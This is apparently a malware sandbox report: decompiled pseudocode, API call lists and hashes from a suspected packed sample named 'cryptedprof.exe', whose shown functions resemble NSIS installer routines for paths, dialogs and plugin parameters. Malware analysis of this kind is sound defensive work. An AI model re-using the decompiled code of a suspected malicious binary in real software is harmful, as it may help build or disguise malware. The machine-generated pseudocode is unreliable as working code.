                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004063a6
                                                                                        0x004063aa
                                                                                        0x00000000
                                                                                        0x004063ac
                                                                                        0x004063ac
                                                                                        0x00000000
                                                                                        0x004063ac
                                                                                        0x004063aa
                                                                                        0x0040650f
                                                                                        0x00406519
                                                                                        0x00406525
                                                                                        0x00406525
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                        • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                        • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 717251189-1230650788
                                                                                        • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                        • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                        • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                        • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 89%
                                                                                        			E709924D8(intOrPtr* _a4) {
                                                                                        				char _v80;
                                                                                        				int _v84;
                                                                                        				intOrPtr _v88;
                                                                                        				short _v92;
                                                                                        				intOrPtr* _t28;
                                                                                        				void* _t30;
                                                                                        				intOrPtr _t31;
                                                                                        				signed int _t43;
                                                                                        				void* _t44;
                                                                                        				intOrPtr _t45;
                                                                                        				void* _t48;
                                                                                        
                                                                                        				_t44 = E70991215();
                                                                                        				_t28 = _a4;
                                                                                        				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                                                        				_v88 = _t45;
                                                                                        				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                                                        				do {
                                                                                        					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                                                        					}
                                                                                        					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                                                        					if(_t43 <= 7) {
                                                                                        						switch( *((intOrPtr*)(_t43 * 4 +  &M70992626))) {
                                                                                        							case 0:
                                                                                        								 *_t44 = 0;
                                                                                        								goto L17;
                                                                                        							case 1:
                                                                                        								__eax =  *__eax;
                                                                                        								if(__ecx > __ebx) {
                                                                                        									_v84 = __ecx;
                                                                                        									__ecx =  *(0x7099307c + __edx * 4);
                                                                                        									__edx = _v84;
                                                                                        									__ecx = __ecx * __edx;
                                                                                        									asm("sbb edx, edx");
                                                                                        									__edx = __edx & __ecx;
                                                                                        									__eax = __eax &  *(0x7099309c + __edx * 4);
                                                                                        								}
                                                                                        								_push(__eax);
                                                                                        								goto L15;
                                                                                        							case 2:
                                                                                        								__eax = E70991429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                        								goto L16;
                                                                                        							case 3:
                                                                                        								__eax = lstrcpynA(__edi,  *__eax,  *0x7099405c);
                                                                                        								goto L17;
                                                                                        							case 4:
                                                                                        								__ecx =  *0x7099405c;
                                                                                        								__edx = __ecx - 1;
                                                                                        								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                                                        								__eax =  *0x7099405c;
                                                                                        								 *((char*)(__eax + __edi - 1)) = __bl;
                                                                                        								goto L17;
                                                                                        							case 5:
                                                                                        								__ecx =  &_v80;
                                                                                        								_push(0x27);
                                                                                        								_push(__ecx);
                                                                                        								_push( *__eax);
                                                                                        								" {*v@u*v"();
                                                                                        								__eax =  &_v92;
                                                                                        								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7099405c, __ebx, __ebx);
                                                                                        								goto L17;
                                                                                        							case 6:
                                                                                        								_push( *__esi);
                                                                                        								L15:
                                                                                        								__eax = wsprintfA(__edi, 0x70994000);
                                                                                        								L16:
                                                                                        								__esp = __esp + 0xc;
                                                                                        								goto L17;
                                                                                        						}
                                                                                        					}
                                                                                        					L17:
                                                                                        					_t30 =  *(_t48 + 0x14);
                                                                                        					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                                                        						GlobalFree(_t30);
                                                                                        					}
                                                                                        					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                                                        					if(_t31 != 0) {
                                                                                        						if(_t31 != 0xffffffff) {
                                                                                        							if(_t31 > 0) {
                                                                                        								E709912D1(_t31 - 1, _t44);
                                                                                        								goto L26;
                                                                                        							}
                                                                                        						} else {
                                                                                        							E70991266(_t44);
                                                                                        							L26:
                                                                                        						}
                                                                                        					}
                                                                                        					_v88 = _v88 - 1;
                                                                                        					_t48 = _t48 - 0x20;
                                                                                        				} while (_v88 >= 0);
                                                                                        				return GlobalFree(_t44);
                                                                                        			}















                                                                                        APIs
                                                                                          • Part of subcall function 70991215: GlobalAlloc.KERNEL32(00000040,70991233,?,709912CF,-7099404B,709911AB,-000000A0), ref: 7099121D
                                                                                        • GlobalFree.KERNEL32 ref: 709925DE
                                                                                        • GlobalFree.KERNEL32 ref: 70992618
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID: {*v@u*v
                                                                                        • API String ID: 1780285237-3183337590
                                                                                        • Opcode ID: 7ea65bb1c61269c3026b06774d6e4150d858db64fd86abd4fec6877204633449
                                                                                        • Instruction ID: fb7d1864557e402c93c165c48a471039844fedf89609e252003079000515331d
                                                                                        • Opcode Fuzzy Hash: 7ea65bb1c61269c3026b06774d6e4150d858db64fd86abd4fec6877204633449
                                                                                        • Instruction Fuzzy Hash: 8B41A072128200EFD706CF55CC94EAE7BBEEBC5204B22452EF542A7220D735AD04EB67
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                        			E709922F1(void* __edx, intOrPtr _a4) {
                                                                                        				signed int _v4;
                                                                                        				signed int _v8;
                                                                                        				void* _t38;
                                                                                        				signed int _t39;
                                                                                        				void* _t40;
                                                                                        				void* _t43;
                                                                                        				void* _t48;
                                                                                        				signed int* _t50;
                                                                                        				signed char* _t51;
                                                                                        
                                                                                        				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                        				while(1) {
                                                                                        					_t9 = _a4 + 0x818; // 0x818
                                                                                        					_t51 = (_v8 << 5) + _t9;
                                                                                        					_t38 = _t51[0x18];
                                                                                        					if(_t38 == 0) {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					_t48 = 0x1a;
                                                                                        					if(_t38 == _t48) {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					if(_t38 != 0xffffffff) {
                                                                                        						if(_t38 <= 0 || _t38 > 0x19) {
                                                                                        							_t51[0x18] = _t48;
                                                                                        						} else {
                                                                                        							_t38 = E709912AD(_t38 - 1);
                                                                                        							L10:
                                                                                        						}
                                                                                        						goto L11;
                                                                                        					} else {
                                                                                        						_t38 = E7099123B();
                                                                                        						L11:
                                                                                        						_t43 = _t38;
                                                                                        						_t13 =  &(_t51[8]); // 0x820
                                                                                        						_t50 = _t13;
                                                                                        						if(_t51[4] >= 0) {
                                                                                        						}
                                                                                        						_t39 =  *_t51 & 0x000000ff;
                                                                                        						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                                                        						_v4 = _t39;
                                                                                        						if(_t39 > 7) {
                                                                                        							L27:
                                                                                        							_t40 = GlobalFree(_t43);
                                                                                        							if(_v8 == 0) {
                                                                                        								return _t40;
                                                                                        							}
                                                                                        							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                        								_v8 = _v8 + 1;
                                                                                        							} else {
                                                                                        								_v8 = _v8 & 0x00000000;
                                                                                        							}
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							switch( *((intOrPtr*)(_t39 * 4 +  &M7099247E))) {
                                                                                        								case 0:
                                                                                        									 *_t50 =  *_t50 & 0x00000000;
                                                                                        									goto L27;
                                                                                        								case 1:
                                                                                        									__eax = E709912FE(__ebx);
                                                                                        									goto L20;
                                                                                        								case 2:
                                                                                        									 *__ebp = E709912FE(__ebx);
                                                                                        									_a4 = __edx;
                                                                                        									goto L27;
                                                                                        								case 3:
                                                                                        									__eax = E70991224(__ebx);
                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                        									L20:
                                                                                        									 *__ebp = __eax;
                                                                                        									goto L27;
                                                                                        								case 4:
                                                                                        									 *0x7099405c =  *0x7099405c +  *0x7099405c;
                                                                                        									__edi = GlobalAlloc(0x40,  *0x7099405c +  *0x7099405c);
                                                                                        									 *0x7099405c = MultiByteToWideChar(0, 0, __ebx,  *0x7099405c, __edi,  *0x7099405c);
                                                                                        									if(_v4 != 5) {
                                                                                        										 *(__esi + 0x1c) = __edi;
                                                                                        										 *__ebp = __edi;
                                                                                        									} else {
                                                                                        										__eax = GlobalAlloc(0x40, 0x10);
                                                                                        										_push(__eax);
                                                                                        										 *(__esi + 0x1c) = __eax;
                                                                                        										_push(__edi);
                                                                                        										 *__ebp = __eax;
                                                                                        										__imp__CLSIDFromString();
                                                                                        										__eax = GlobalFree(__edi);
                                                                                        									}
                                                                                        									goto L27;
                                                                                        								case 5:
                                                                                        									if( *__ebx != 0) {
                                                                                        										__eax = E709912FE(__ebx);
                                                                                        										 *__edi = __eax;
                                                                                        									}
                                                                                        									goto L27;
                                                                                        								case 6:
                                                                                        									__esi =  *(__esi + 0x18);
                                                                                        									__esi = __esi - 1;
                                                                                        									__esi = __esi *  *0x7099405c;
                                                                                        									__esi = __esi +  *0x70994064;
                                                                                        									__eax = __esi + 0xc;
                                                                                        									 *__edi = __esi + 0xc;
                                                                                        									asm("cdq");
                                                                                        									__eax = E70991429(__edx, __esi + 0xc, __edx, __esi);
                                                                                        									goto L27;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					L9:
                                                                                        					_t38 = E70991224(0x70994034);
                                                                                        					goto L10;
                                                                                        				}
                                                                                        			}













                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32 ref: 70992447
                                                                                          • Part of subcall function 70991224: lstrcpynA.KERNEL32(00000000,?,709912CF,-7099404B,709911AB,-000000A0), ref: 70991234
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 709923C2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 709923D7
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 709923E8
                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 709923F6
                                                                                        • GlobalFree.KERNEL32 ref: 709923FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                        • String ID: @u*v
                                                                                        • API String ID: 3730416702-1046951355
                                                                                        • Opcode ID: 88628f918c9a972f4bfce934c2bb5cfdb8397aa26ca201933fa2e38d097548dc
                                                                                        • Instruction ID: e5e7e5efd1fa835425aa1713fbb4671824da6f87bdf469f26850e5d12514970e
                                                                                        • Opcode Fuzzy Hash: 88628f918c9a972f4bfce934c2bb5cfdb8397aa26ca201933fa2e38d097548dc
                                                                                        • Instruction Fuzzy Hash: 98419C71528300EFD3119F21C845BAE77ECFBC4711F21892AF556DA2A0D738A904DB6B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00406528(CHAR* _a4) {
                                                                                        				char _t5;
                                                                                        				char _t7;
                                                                                        				char* _t15;
                                                                                        				char* _t16;
                                                                                        				CHAR* _t17;
                                                                                        
                                                                                        				_t17 = _a4;
                                                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                        					_t17 =  &(_t17[4]);
                                                                                        				}
                                                                                        				if( *_t17 != 0 && E00405C52(_t17) != 0) {
                                                                                        					_t17 =  &(_t17[2]);
                                                                                        				}
                                                                                        				_t5 =  *_t17;
                                                                                        				_t15 = _t17;
                                                                                        				_t16 = _t17;
                                                                                        				if(_t5 != 0) {
                                                                                        					do {
                                                                                        						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
                                                                                        							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                        							_t16 = CharNextA(_t16);
                                                                                        						}
                                                                                        						_t17 = CharNextA(_t17);
                                                                                        						_t5 =  *_t17;
                                                                                        					} while (_t5 != 0);
                                                                                        				}
                                                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                                                        				while(1) {
                                                                                        					_t16 = CharPrevA(_t15, _t16);
                                                                                        					_t7 =  *_t16;
                                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                        						break;
                                                                                        					}
                                                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                                                        					if(_t15 < _t16) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					break;
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}









                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                        • CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                        Strings
                                                                                        • *?|<>/":, xrefs: 00406570
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00406564
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-1759631272
                                                                                        • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                        • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                        • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                        • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                        				struct tagLOGBRUSH _v16;
                                                                                        				long _t39;
                                                                                        				long _t41;
                                                                                        				void* _t44;
                                                                                        				signed char _t50;
                                                                                        				long* _t54;
                                                                                        
                                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                                        					L18:
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                        					goto L18;
                                                                                        				} else {
                                                                                        					_t50 = _t54[5];
                                                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                                                        						goto L18;
                                                                                        					}
                                                                                        					_t39 =  *_t54;
                                                                                        					if((_t50 & 0x00000002) != 0) {
                                                                                        						_t39 = GetSysColor(_t39);
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                                                        						SetTextColor(_a8, _t39);
                                                                                        					}
                                                                                        					SetBkMode(_a8, _t54[4]);
                                                                                        					_t41 = _t54[1];
                                                                                        					_v16.lbColor = _t41;
                                                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                                                        						_t41 = GetSysColor(_t41);
                                                                                        						_v16.lbColor = _t41;
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                                                        						SetBkColor(_a8, _t41);
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                                                        						_v16.lbStyle = _t54[2];
                                                                                        						_t44 = _t54[3];
                                                                                        						if(_t44 != 0) {
                                                                                        							DeleteObject(_t44);
                                                                                        						}
                                                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                        					}
                                                                                        					return _t54[3];
                                                                                        				}
                                                                                        			}










                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                        • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                        • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405374(CHAR* _a4, CHAR* _a8) {
                                                                                        				struct HWND__* _v8;
                                                                                        				signed int _v12;
                                                                                        				CHAR* _v32;
                                                                                        				long _v44;
                                                                                        				int _v48;
                                                                                        				void* _v52;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				CHAR* _t26;
                                                                                        				signed int _t27;
                                                                                        				CHAR* _t28;
                                                                                        				long _t29;
                                                                                        				signed int _t39;
                                                                                        
                                                                                        				_t26 =  *0x42ec24; // 0x0
                                                                                        				_v8 = _t26;
                                                                                        				if(_t26 != 0) {
                                                                                        					_t27 =  *0x42f514;
                                                                                        					_v12 = _t27;
                                                                                        					_t39 = _t27 & 0x00000001;
                                                                                        					if(_t39 == 0) {
                                                                                        						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
                                                                                        					}
                                                                                        					_t26 = lstrlenA(0x42a098);
                                                                                        					_a4 = _t26;
                                                                                        					if(_a8 == 0) {
                                                                                        						L6:
                                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                                        							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
                                                                                        						}
                                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                                        							_v32 = 0x42a098;
                                                                                        							_v52 = 1;
                                                                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                        							_v44 = 0;
                                                                                        							_v48 = _t29 - _t39;
                                                                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                        						}
                                                                                        						if(_t39 != 0) {
                                                                                        							_t28 = _a4;
                                                                                        							 *((char*)(_t28 + 0x42a098)) = 0;
                                                                                        							return _t28;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                        						if(_t26 < 0x800) {
                                                                                        							_t26 = lstrcatA(0x42a098, _a8);
                                                                                        							goto L6;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				return _t26;
                                                                                        			}


















                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                        • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                        • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                        • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2531174081-0
                                                                                        • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                        • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                        • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                        • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402E52(intOrPtr _a4) {
                                                                                        				char _v68;
                                                                                        				long _t6;
                                                                                        				struct HWND__* _t7;
                                                                                        				struct HWND__* _t15;
                                                                                        
                                                                                        				if(_a4 != 0) {
                                                                                        					_t15 =  *0x42946c;
                                                                                        					if(_t15 != 0) {
                                                                                        						_t15 = DestroyWindow(_t15);
                                                                                        					}
                                                                                        					 *0x42946c = 0;
                                                                                        					return _t15;
                                                                                        				}
                                                                                        				if( *0x42946c != 0) {
                                                                                        					return E00406692(0);
                                                                                        				}
                                                                                        				_t6 = GetTickCount();
                                                                                        				if(_t6 >  *0x42f450) {
                                                                                        					if( *0x42f448 == 0) {
                                                                                        						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
                                                                                        						 *0x42946c = _t7;
                                                                                        						return ShowWindow(_t7, 5);
                                                                                        					}
                                                                                        					if(( *0x42f514 & 0x00000001) != 0) {
                                                                                        						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                                                        						return E00405374(0,  &_v68);
                                                                                        					}
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}








                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                                        • GetTickCount.KERNEL32 ref: 00402E88
                                                                                        • wsprintfA.USER32 ref: 00402EB6
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                          • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                        • String ID: ... %d%%
                                                                                        • API String ID: 722711167-2449383134
                                                                                        • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                        • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                        • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                        • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
                                                                                        				long _v8;
                                                                                        				signed char _v12;
                                                                                        				unsigned int _v16;
                                                                                        				void* _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				long _v56;
                                                                                        				void* _v60;
                                                                                        				long _t15;
                                                                                        				unsigned int _t19;
                                                                                        				signed int _t25;
                                                                                        				struct HWND__* _t28;
                                                                                        
                                                                                        				_t28 = _a4;
                                                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                        				if(_a8 == 0) {
                                                                                        					L4:
                                                                                        					_v56 = _t15;
                                                                                        					_v60 = 4;
                                                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                        					return _v24;
                                                                                        				}
                                                                                        				_t19 = GetMessagePos();
                                                                                        				_v16 = _t19 >> 0x10;
